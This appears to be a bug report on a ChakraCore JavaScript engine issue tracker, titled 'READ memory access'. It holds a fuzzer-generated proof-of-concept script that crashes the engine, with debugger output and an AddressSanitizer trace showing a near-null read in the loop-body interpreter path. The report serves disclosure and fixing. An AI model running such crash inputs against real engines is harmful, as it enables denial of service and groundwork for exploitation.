
READ memory access #6645

@bird8693

Description

@bird8693

ubuntu

ubuntu 16

poc

// Fuzzer-style reproducer: the engine is what is under test, so the exact statement
// shape is load-bearing and should not be "cleaned up" (see the ASan trace further down).
function main() {
    let arr = new Array(100);
    arr[0] = 1.1;                     // only index 0 is assigned; the remaining 99 slots are never written
    this.__defineSetter__(1.1);       // only a property name is passed; no setter function argument
    // The condition reads the script-global `var ijjkkk` (declared by the inner loop
    // near the bottom of the script), not this loop's own `i`.
    for (let i = 0; ijjkkk < 100000; i++)
        opt(arr, 0, 0.014717213834064102);   // `opt` is not defined anywhere on this page
    Ttyn[0] = 2.3023e-320;            // `Ttyn` is not defined anywhere on this page; the value is a subnormal double
    opt(3.141592653589793, 1.7976931348623157e+308, 3.141592653589793);   // pi, Number.MAX_VALUE, pi
    main();                           // unconditional self-recursion; there is no base case
}
// Top-level script, sloppy mode: `this` here is the global object.
// The ASan report further down records a SEGV on a READ of address 0x8 ("address points
// to the zero page") in an unsymbolized frame reached through
// Js::InterpreterStackFrame::CallLoopBody, i.e. a near-null read while a loop body is
// executing; which of the loops below is the one involved is not stated on this page.
var tWtH = new String();            // empty String wrapper object, later passed to main()
this.x = 4660;
var hExw = 2147483649 ** -2147483649;   // exponentiation operator; the result is never read
// 749 outer iterations, each running a 100000-iteration inner loop — presumably to make
// the loop bodies hot enough for the loop-body path named in the trace (not confirmed here).
for (let i = 0; i < 749; i++) {
    this[i + i + i + ('new Number(1)' + ('new Number(1)' + i))] = 1;   // one new global property per iteration; the key depends on i
    var aaMw = Function.prototype.toString('new Number(1)' + i);   // Function.prototype.toString takes no parameters, so the string argument is ignored
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {   // `var`: ijjkkk is script-global and is also read by main()'s loop condition
        var KdrP = -4294967297 + -4294967295;   // constant expression; never read
    }
    print();                        // not defined on this page (presumably a host-provided builtin)
    var QtYj = escape('v0');        // result never read
    let arr = new Array(100);       // block-scoped; unrelated to the `arr` inside main()
}
// main() declares no parameters (see its definition above), so every argument passed
// to it below is ignored.
main('valueOf', () => {
});
this.__defineSetter__('valueOf', () => {
});
var aaMw = main(tWtH);              // redeclares aaMw; main() has no return statement
main(0.1, -4294967295);
var AziF = Proxy;                   // holds the Proxy constructor; never read
this.__defineSetter__('\'0\'', () => {   // the property name is the three characters '0', quotes included
});
opt('valueOf', () => {               // `opt` is not defined anywhere on this page
});
// `b2` is not defined on this page. The update expression increments a global
// property, never `i`, so `i` stays 0 for as long as this loop runs.
for (let i = 0; i < b2[72]; this['new Number(1)' + i]++) {
    this.__defineSetter__('valueOf', () => {
    });
    this['new Number(1)'] = 1;
}

gef output

   0x7ffff7e225bd                  mov    QWORD PTR [rsp+0x10], rdx
   0x7ffff7e225c2                  mov    QWORD PTR [rsp+0x8], rsi
   0x7ffff7e225c7                  mov    QWORD PTR [rsp], rdi
 → 0x7ffff7e225cb                  rex.W  call rax
   0x7ffff7e225ce                  mov    rax, QWORD PTR [rbx+0x8]
   0x7ffff7e225d2                  xor    ecx, ecx
   0x7ffff7e225d4                  mov    rdx, QWORD PTR [rbp-0x28]
   0x7ffff7e225d8                  cmp    rax, QWORD PTR [rdx]
   0x7ffff7e225db                  jne    0x7ffff7e22e5e
─────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "ch", stopped 0x7ffff7e225cb in ?? (), reason: SIGSEGV
[#1] Id 2, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#2] Id 3, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#3] Id 4, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff7e225cb → rex.W call rax
[#1] 0x7fffffffd1d0 → add al, dh


asan output

ASAN:DEADLYSIGNAL
=================================================================
==52626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f8d5ea4330b bp 0x7ffd17f7e440 sp 0x7ffd17f7e330 T0)
==52626==The signal is caused by a READ memory access.
==52626==Hint: address points to the zero page.
    #0 0x7f8d5ea4330a  (<unknown module>)
    #1 0x561a58015642 in Js::InterpreterStackFrame::CallLoopBody(void* (*)(Js::RecyclableObject*, Js::CallInfo, ...)) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:6313:13
    #2 0x561a58015642 in Js::InterpreterStackFrame::DoLoopBodyStart(unsigned int, Js::LayoutSize, bool, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:6117
    #3 0x561a5801a309 in void Js::InterpreterStackFrame::ProfiledLoopBodyStart<false, true>(unsigned int, Js::LayoutSize, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5885:41
    #4 0x561a57e36075 in unsigned char const* Js::InterpreterStackFrame::OP_ProfiledLoopBodyStart<(Js::LayoutSize)0, true>(unsigned int) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5857:9
    #5 0x561a57e36075 in unsigned char const* Js::InterpreterStackFrame::OP_ProfiledLoopBodyStart<(Js::LayoutSize)0, true>(unsigned char const*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5729
    #6 0x561a57e36075 in Js::InterpreterStackFrame::ProcessProfiled() /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterHandler.inl:51
    #7 0x561a57d9c679 in Js::InterpreterStackFrame::Process() /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:3427:20
    #8 0x561a57d9a890 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:2107:40
    #9 0x561a57d99c08 in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:1786:16
    #10 0x7f8d5eaa0fa1  (<unknown module>)
    #11 0x561a586daa0d in amd64_CallFunction /root/AFL/compile/ChakraCore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100
    #12 0x561a582fec10 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:772:24
    #13 0x561a582fe91e in Js::JavascriptFunction::CallRootFunction(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:717:15
    #14 0x561a582fe91e in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:832
    #15 0x561a57796caa in RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83::operator()(Js::ScriptContext*, TTD::TTDJsRTActionResultAutoRecorder&) const /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:3705:49
    #16 0x561a57796caa in _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}::operator()(Js::ScriptContext*) const /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:237
    #17 0x561a57796caa in _JsErrorCode ContextAPIWrapper_Core<false, _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}>(_JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}) /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:192
    #18 0x561a57796caa in _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83) /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:235
    #19 0x561a57796caa in RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**) /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:3656
    #20 0x561a577a049a in CompileRun(void*, unsigned long, void*, _JsParseScriptAttributes, void**, bool) /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:5019:12
    #21 0x561a577a049a in JsRun /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:5041
    #22 0x561a57689419 in ChakraRTInterface::JsRun(void*, unsigned long, void*, _JsParseScriptAttributes, void**) /root/AFL/compile/ChakraCore/bin/ch/ChakraRtInterface.h:483:179
    #23 0x561a57689419 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:491
    #24 0x561a5768bc44 in ExecuteTest(char const*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:963:13
    #25 0x561a5768c9a7 in ExecuteTestWithMemoryCheck(char*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:1013:10
    #26 0x561a5768c9a7 in main /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:1320
    #27 0x7f8d62fc682f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291
    #28 0x561a57591298 in _start (/root/AFL/tt/chnew/ch2+0x2d7298)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (<unknown module>) 
==52626==ABORTING

